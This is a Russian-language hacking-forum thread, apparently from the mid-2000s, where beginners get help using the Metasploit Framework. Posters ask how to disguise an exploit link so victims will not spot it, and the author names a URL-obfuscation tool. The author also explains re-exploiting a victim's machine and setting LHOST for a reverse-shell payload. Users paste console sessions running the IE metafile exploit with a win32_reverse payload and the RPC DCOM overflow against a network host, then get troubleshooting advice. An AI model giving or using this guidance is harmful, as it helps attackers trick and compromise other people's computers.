Авторские статьи Metasploit Framework для ламеров

Discussion in 'Статьи' started by -=lebed=-, 11 Jul 2006.

?
  1. Да, пользуюсь и доволен.

    51.2%
  2. Нет, он меня не устраивает, не нужен и т. п.

    14.8%
  3. А что это?

    34.0%
  1. S1ndroM

    S1ndroM New Member

    Joined:
    29 May 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Нда а 3.0 почемуто нет возможност как консольное приложение запускать =\
     
  2. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Угу, там консоль эмулируется через web-интерфейс...
     
  3. S1ndroM

    S1ndroM New Member

    Joined:
    29 May 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    нда...:((( надо уже на *nix переходить, а то одно мозго..бство
     
  4. timphp

    timphp New Member

    Joined:
    22 Apr 2007
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Парни где можно ссылку замаскировать ? А то в виде Ip:порт палевно как то ...
     
    1 person likes this.
  5. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    http://mrpip.orcon.net.nz/href/urlhexa.html
     
    1 person likes this.
  6. timphp

    timphp New Member

    Joined:
    22 Apr 2007
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Спасибо ...
     
  7. timphp

    timphp New Member

    Joined:
    22 Apr 2007
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    Парни тут такая ситуация я подключился через web интерфейс,а как перевести в консоль ???
    И как после off-line'а востановить соеденение с конкретным ip ???
     
  8. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Кнопочку Console нажми - будет тебе сэмулирована консоль в web. (это актуально для MSF 3.0) в 2.7 отдельный батник для запуска консоли...

    Что значить восстановить соединение с конкретным ip ? С взломанным компом что-ль? Никак, если троя, систему удалённого администрирования и т. п. не залил на комп жертвы... - снова ломать нада, команда rexploit (реэксплуатация, ну типа перезапустить сплоит, если все параметры уже заданы).
     
    1 person likes this.
  9. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Очередная статья, появивщаяся в результате радости познания новых технологий самим автором. Это нормально... Помоему на том же метасплойте есть документация.
    А тут просто переведенная в молодежный формат со словами "...О! тут дофига всего..." и "...Облом! Это что ещё?..." мануал. Проще было бы если бы ты просто перевел на русский ридми (или что там у них?) или составил бы описание того, что знаешь и так бы и написал - "перевод на русский доков"/"описание того что я сам понял в metasploit"
    В основном статья выглядит серьезным трудом из-за разноцветных заголовков, на которые, уверен, действительно ушло много времени. Ну зато хотя бы тема серьезная а не "компеляцоя пинча в среде виндоус 95 для новичков".

    Нерд вынудила поставить плюс за статью потому что "я офигел" по её словам...

    знали бы авторы метасплойта для чего используют их творение - потеряли бы веру в человечество ; )
     
    2 people like this.
  10. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Глянь видео моё, увидишь что для благих целей использую... (я по крайней мере). - Так что авторы веру в человечество не потеряют, кстате им особый респект за этот проект.
     
    1 person likes this.
  11. Case69

    Case69 New Member

    Joined:
    8 Feb 2007
    Messages:
    5
    Likes Received:
    2
    Reputations:
    -1
    хорошая статья узнал чё такое Metasploit а то до этого только чёто слышал
    от себя могу добавить для установки Metasploit Framework в генто линукс надо:
    emerge -av net-analyzer/metasploit
     
  12. ·[p3k]·

    ·[p3k]· New Member

    Joined:
    16 Jun 2007
    Messages:
    4
    Likes Received:
    2
    Reputations:
    0
    Вообще-то, зря все так подробно разжевано, и указан способ использования МСФ не по назначению.

    Почему? Да просто прочитав эту статью появятся кулхацкеры, будут крушить, ломать все подряд.

    Но все равно lebed кул статья, как минимум видно, что старался для таких как я. Кстати, KEZ, у любого изобретения есть минимум 2 способа его использования. Примеры приводить не буду, потому что в голову приходят всякий бред.

    В любом случае автору зачот.

    П.С. Сорри, если уж как-то самоуверенно говорю.
     
  13. Vorlan

    Vorlan Elder - Старейшина

    Joined:
    9 Jun 2007
    Messages:
    29
    Likes Received:
    6
    Reputations:
    0
    А как туда новые эксплойти засунуть и какое расширение у них должно быть, .pm или .pl тоже можно?
     
  14. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Новые эксплоиты щас пишутся на Руби (для ветки MSF 3.0), расширение у них соответственно .rb лежат в соответствующих подпапках тут: c:\Program Files\Metasploit\Framework3\framework\modules\exploits\
    Онлайн апдейт решает проблему добавления новых сплоитов автоматом. Поддержка MSF 2.7 в плане написания новых сплоитов имхо официально не осуществляется. (можешь писать сам сплоиты для MSF 2.7)
     
  15. Tzar

    Tzar New Member

    Joined:
    21 Aug 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    у меня пишет что клиент подключился,идёт редиректинг.. какой адрес нужно указать для редиректинга?у меня адсл.
     
  16. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Для payload (типа реверсшелл) LHOST=твой_внешний_IP
     
  17. Tzar

    Tzar New Member

    Joined:
    21 Aug 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    я задаю внешний ip. а он всё равно открывает сервак на IP одинаковом для всех пользователей нашей сети .. что делать?

    msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 88.147.181.4
    LHOST -> 88.147.181.4
    msf ie_xp_pfv_metafile(win32_reverse) > exploit
    [*] Starting Reverse Handler.
    [*] Waiting for connections to http://192.168.1.33:8080/
    [*] HTTP Client connected from 192.168.1.33:1910, redirecting...(захожу сам IE 6)
    [*] HTTP Client connected from 192.168.1.33:1913, redirecting...(захожу сам IE6 )
    и.. ничего. всё.В чём причина?
     
    #77 Tzar, 28 Aug 2007
    Last edited: 28 Aug 2007
  18. Tzar

    Tzar New Member

    Joined:
    21 Aug 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Lebed,токма на тя уповаю )) Ответь,а?
     
  19. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Т.е. даже сам себя похекать не можешь?
    Тут имхо может быть несколько вариантов:
    а) редирект происходит, если порт уже чем то занят, вот и идёт перебор по всем попорядку...
    б) порты закрыты фаером или используется NAT.
    в) сплоит не пробивает систему (браузер)=пропатчена.
    г) бажная dll не подгружается, так как вредоносный tiff-файл обрабатывается другой dll (Например установлен ACDSee) и шеллкод (реверсшелл) не получает управления.

    ЗЫ тесть на чистой XP SP2 и всё должно получиться...
     
    2 people like this.
  20. Levitan

    Levitan Guest

    Reputations:
    0
    В сети есть уязвимый компьютер (Microsoft RPC DCOM Interface Overflow )
    При эксплойтировании metasploit'ом v 3.0 ничего не выходит:
    [*] Started reverse handler
    [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
    [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.11.109.2[135] ...
    [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.11.109.2[135] ...
    [*] Sending exploit ...
    [-] Exploit failed: DCERPC FAULT => nca_s_fault_ndr

    Хотя, используя версию 2.6, всё проходит на ура. В чём может быть трабла?